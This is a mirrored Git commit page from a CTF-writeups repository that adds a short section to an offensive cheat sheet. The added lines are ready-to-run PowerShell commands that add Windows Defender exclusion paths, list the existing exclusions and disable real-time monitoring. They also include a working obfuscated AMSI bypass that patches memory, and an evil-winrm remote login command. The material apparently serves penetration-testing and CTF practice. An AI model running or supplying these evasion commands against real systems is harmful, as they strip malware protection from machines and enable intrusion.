Mirrors/CTF-Writeups
2
0
Fork 0
mirror of https://github.com/AbdullahRizwan101/CTF-Writeups synced 2024-11-24 21:03:07 +00:00
Code Issues Projects Releases Packages Wiki Activity

Update Cheat Sheet.md

Browse source
This commit is contained in:
ARZ 2022-07-16 23:41:15 +05:00 committed by GitHub
parent 561f4b91c1
commit 05c5690c0b
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 19 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

19
Cheat Sheet.md
View file

@ -387,6 +387,25 @@ Or
Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe
```
### Defender Add exclusion path
`Add-MpPreference -ExclusionPath C:\temp`
### Defender exclusion path
`reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions" /s`
### Disabling defender
`Set-MpPreference -DisableRealtimeMonitoring $true`
### AMSI Bypass
```
$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils"){$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
```
https://gist.github.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093
### Evil-winrm
`evil-winrm -i IP -u <USER> -p <PASS>`